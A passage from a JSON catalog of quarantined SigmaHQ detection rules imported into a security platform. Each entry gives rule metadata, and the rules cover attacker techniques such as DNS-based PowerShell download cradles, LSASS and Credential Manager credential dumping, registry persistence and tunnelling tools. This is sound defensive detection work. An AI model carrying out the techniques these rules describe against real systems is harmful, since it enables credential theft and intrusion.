"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-vpn-tunnel-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99980a85-3a61-43d3-ac0f-b68d6b4797b1", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_vpn_tunnel_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-999bff6d-dc15-44c9-9f5c-e1051bfc86e1", "type": "detection", "name": "Nslookup PowerShell Download Cradle", "description": "Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/nslookup-powershell-download-cradle.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml" } }, { "id": "sigmahq-sigma-999c3b12-0a8c-40b6-8e13-dd7d62b75c7a", "type": "detection", "name": "Potentially Suspicious Named Pipe Created Via Mkfifo", "description": "Detects the creation of a new named pipe using the \"mkfifo\" utility in a potentially suspicious location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-named-pipe-created-via-mkfifo.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "999c3b12-0a8c-40b6-8e13-dd7d62b75c7a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml" } }, { "id": "sigmahq-sigma-99b7460d-c9f1-40d7-a316-1f36f61d52ee", "type": "detection", "name": "Cscript/Wscript Uncommon Script Extension Execution", "description": "Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cscript-wscript-uncommon-script-extension-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99b7460d-c9f1-40d7-a316-1f36f61d52ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml" } }, { "id": "sigmahq-sigma-99b97608-3e21-4bfe-8217-2a127c396a0e", "type": "detection", "name": "Remote Thread Creation Via PowerShell In Uncommon Target", "description": "Detects the creation of a remote thread from a Powershell process in an uncommon target process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011", "T1059.001" ], "log_source": null, 
"playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-thread-creation-via-powershell-in-uncommon-target.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99b97608-3e21-4bfe-8217-2a127c396a0e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml" } }, { "id": "sigmahq-sigma-99c4658d-2c5e-4d87-828d-7c066ca537c3", "type": "detection", "name": "Disable-WindowsOptionalFeature Command PowerShell", "description": "Detects the built-in PowerShell cmdlet Disable-WindowsOptionalFeature, a Deployment Image Servicing and Management (DISM) tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-windowsoptionalfeature-command-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml" } }, { "id": "sigmahq-sigma-99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", "type": 
"detection", "name": "Dump Credentials from Windows Credential Manager With PowerShell", "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dump-credentials-from-windows-credential-manager-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml" } }, { "id": "sigmahq-sigma-99c840f2-2012-46fd-9141-c761987550ef", "type": "detection", "name": "Suspicious Download From Direct IP Via Bitsadmin", "description": "Detects bitsadmin downloading a file using a URL that contains an IP address", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1197", "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-download-from-direct-ip-via-bitsadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"99c840f2-2012-46fd-9141-c761987550ef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml" } }, { "id": "sigmahq-sigma-99c8be4f-3087-4f9f-9c24-8c7e257b442e", "type": "detection", "name": "Setup16.EXE Execution With Custom .Lst File", "description": "Detects the execution of \"Setup16.EXE\", an old installation utility, with a custom \".lst\" file.\nThese \".lst\" files can contain references to external programs that \"Setup16.EXE\" will execute.\nAttackers and adversaries might leverage this as a living-off-the-land utility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/setup16-exe-execution-with-custom-lst-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99c8be4f-3087-4f9f-9c24-8c7e257b442e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_setup16_custom_lst_execution.yml" } }, { "id": "sigmahq-sigma-99cf1e02-00fb-4c0d-8375-563f978dfd37", "type": "detection", "name": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. 
This can be used to hide services or make them unstoppable.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/deny-service-access-using-security-descriptor-tampering-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml" } }, { "id": "sigmahq-sigma-9a019ffc-3580-4c9d-8d87-079f7e8d3fd4", "type": "detection", "name": "Cloudflared Tunnel Execution", "description": "Detects execution of the \"cloudflared\" tool to connect back to a tunnel. 
This was seen used by threat actors to maintain persistence and remote access to compromised networks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102", "T1090", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cloudflared-tunnel-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a019ffc-3580-4c9d-8d87-079f7e8d3fd4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_run.yml" } }, { "id": "sigmahq-sigma-9a025188-6f2d-42f8-bb2f-d3a83d24a5af", "type": "detection", "name": "Windows AppX Deployment Unsigned Package Installation", "description": "Detects attempts to install unsigned MSIX/AppX packages using the -AllowUnsigned parameter via AppXDeployment-Server events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1553.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-appx-deployment-unsigned-package-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a025188-6f2d-42f8-bb2f-d3a83d24a5af", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/appxdeployment_server/win_appxpackaging_server_unsigned_package_installation.yml" } }, { "id": "sigmahq-sigma-9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "type": "detection", "name": "Microsoft VBA For Outlook Addin Loaded Via Outlook", "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-vba-for-outlook-addin-loaded-via-outlook.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_office_outlook_outlvba_load.yml" } }, { "id": "sigmahq-sigma-9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", "type": "detection", "name": "System Owner or User Discovery - Linux", "description": "Detects the execution of host or user discovery utilities such as \"whoami\", \"hostname\", \"id\", etc.\nAdversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/system-owner-or-user-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_user_discovery.yml" } }, { "id": "sigmahq-sigma-9a132afa-654e-11eb-ae93-0242ac130002", "type": "detection", "name": "PUA - AdFind Suspicious Execution", "description": "Detects AdFind execution with common flags seen used during attacks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1018", "T1087.002", "T1482", "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-adfind-suspicious-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a132afa-654e-11eb-ae93-0242ac130002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml" } }, { "id": "sigmahq-sigma-9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "type": "detection", "name": "Potential Credential Dumping Via WER", "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", 
"mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-credential-dumping-via-wer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml" } }, { "id": "sigmahq-sigma-9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "type": "detection", "name": "SysKey Registry Keys Access", "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/syskey-registry-keys-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_syskey_registry_access.yml" } }, { "id": "sigmahq-sigma-9a60e676-26ac-44c3-814b-0c2a8b977adf", "type": "detection", "name": "User Access Blocked by Azure Conditional Access", "description": "Detect access has been blocked by Conditional Access policies.\nThe access policy does not allow token 
issuance which might be signs of unauthorized login to valid accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110", "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-access-blocked-by-azure-conditional-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a60e676-26ac-44c3-814b-0c2a8b977adf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_user_login_blocked_by_conditional_access.yml" } }, { "id": "sigmahq-sigma-9a7a0393-2144-4626-9bf1-7c2f5a7321db", "type": "detection", "name": "System Network Connections Discovery - MacOs", "description": "Detects usage of system utilities to discover system network connections", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-network-connections-discovery-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" } }, { "id": 
"sigmahq-sigma-9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", "type": "detection", "name": "Forfiles Command Execution", "description": "Detects the execution of \"forfiles\" with the \"/c\" flag.\nWhile this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.\nCan be used to bypass application whitelisting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/forfiles-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_forfiles_proxy_execution_.yml" } }, { "id": "sigmahq-sigma-9ac8b09b-45de-4a07-9da1-0de8c09304a3", "type": "detection", "name": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", "description": "Detects Obfuscated use of stdin to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-stdin-launcher-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml" } }, { "id": "sigmahq-sigma-9ac94dc8-9042-493c-ba45-3b5e7c86b980", "type": "detection", "name": "Disable Important Scheduled Task", "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-important-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_disable.yml" } }, { "id": "sigmahq-sigma-9ace0707-b560-49b8-b6ca-5148b42f39fb", "type": "detection", "name": "Potential Persistence Via Logon Scripts - Registry", "description": "Detects creation of \"UserInitMprLogonScript\" registry value which can be used as a persistence method by malicious actors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1037.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potential-persistence-via-logon-scripts-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript.yml" } }, { "id": "sigmahq-sigma-9acf45ed-3a26-4062-bf08-56857613eb52", "type": "detection", "name": "New File Exclusion Added To Time Machine Via Tmutil - MacOS", "description": "Detects the addition of a new file or path exclusion to MacOS Time Machine via the \"tmutil\" utility.\nAn adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-file-exclusion-added-to-time-machine-via-tmutil-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9acf45ed-3a26-4062-bf08-56857613eb52", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml" } }, { "id": "sigmahq-sigma-9ae01559-cf7e-4f8e-8e14-4c290a1b4784", "type": "detection", "name": "CredUI.DLL Loaded By Uncommon Process", "description": "Detects loading of \"credui.dll\" and related 
DLLs by an uncommon process. Attackers might leverage this DLL for potential use of \"CredUIPromptForCredentials\" or \"CredUnPackAuthenticationBufferW\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1056.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credui-dll-loaded-by-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_credui_uncommon_process_load.yml" } }, { "id": "sigmahq-sigma-9b0b7ac3-6223-47aa-a3fd-e8f211e637db", "type": "detection", "name": "Changing Existing Service ImagePath Value Via Reg.EXE", "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/changing-existing-service-imagepath-value-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language 
not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml" } }, { "id": "sigmahq-sigma-9b0f8a61-91b2-464f-aceb-0527e0a45020", "type": "detection", "name": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", "description": "Detects COM object hijacking via TreatAs subkey", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-com-object-hijacking-via-treatas-subkey-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_com_key_linking.yml" } }, { "id": "sigmahq-sigma-9b111d8e-92e0-4153-88bc-daefc1333aba", "type": "detection", "name": "DMSA Link Attributes Modified", "description": "Detects modification of dMSA link attributes (msDS-ManagedAccountPrecededByLink) via PowerShell scripts.\nThis command line pattern could be an indicator of an attempt to exploit the BadSuccessor privilege escalation vulnerability in Windows Server 2025.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", 
"mitre_techniques": [ "T1078.002", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dmsa-link-attributes-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b111d8e-92e0-4153-88bc-daefc1333aba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_modification_of_dmsa_link_attribute.yml" } }, { "id": "sigmahq-sigma-9b1b8e9b-0a5d-4af1-9d2f-4c4b6e7c2c9d", "type": "detection", "name": "AWS STS GetCallerIdentity Enumeration Via TruffleHog", "description": "Detects the use of TruffleHog for AWS credential validation by identifying GetCallerIdentity API calls where the userAgent indicates TruffleHog.\nThreat actors leverage TruffleHog to enumerate and validate exposed AWS keys.\nSuccessful exploitation allows threat actors to confirm the validity of compromised AWS credentials, facilitating further unauthorized access and actions within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-sts-getcalleridentity-enumeration-via-trufflehog.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b1b8e9b-0a5d-4af1-9d2f-4c4b6e7c2c9d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
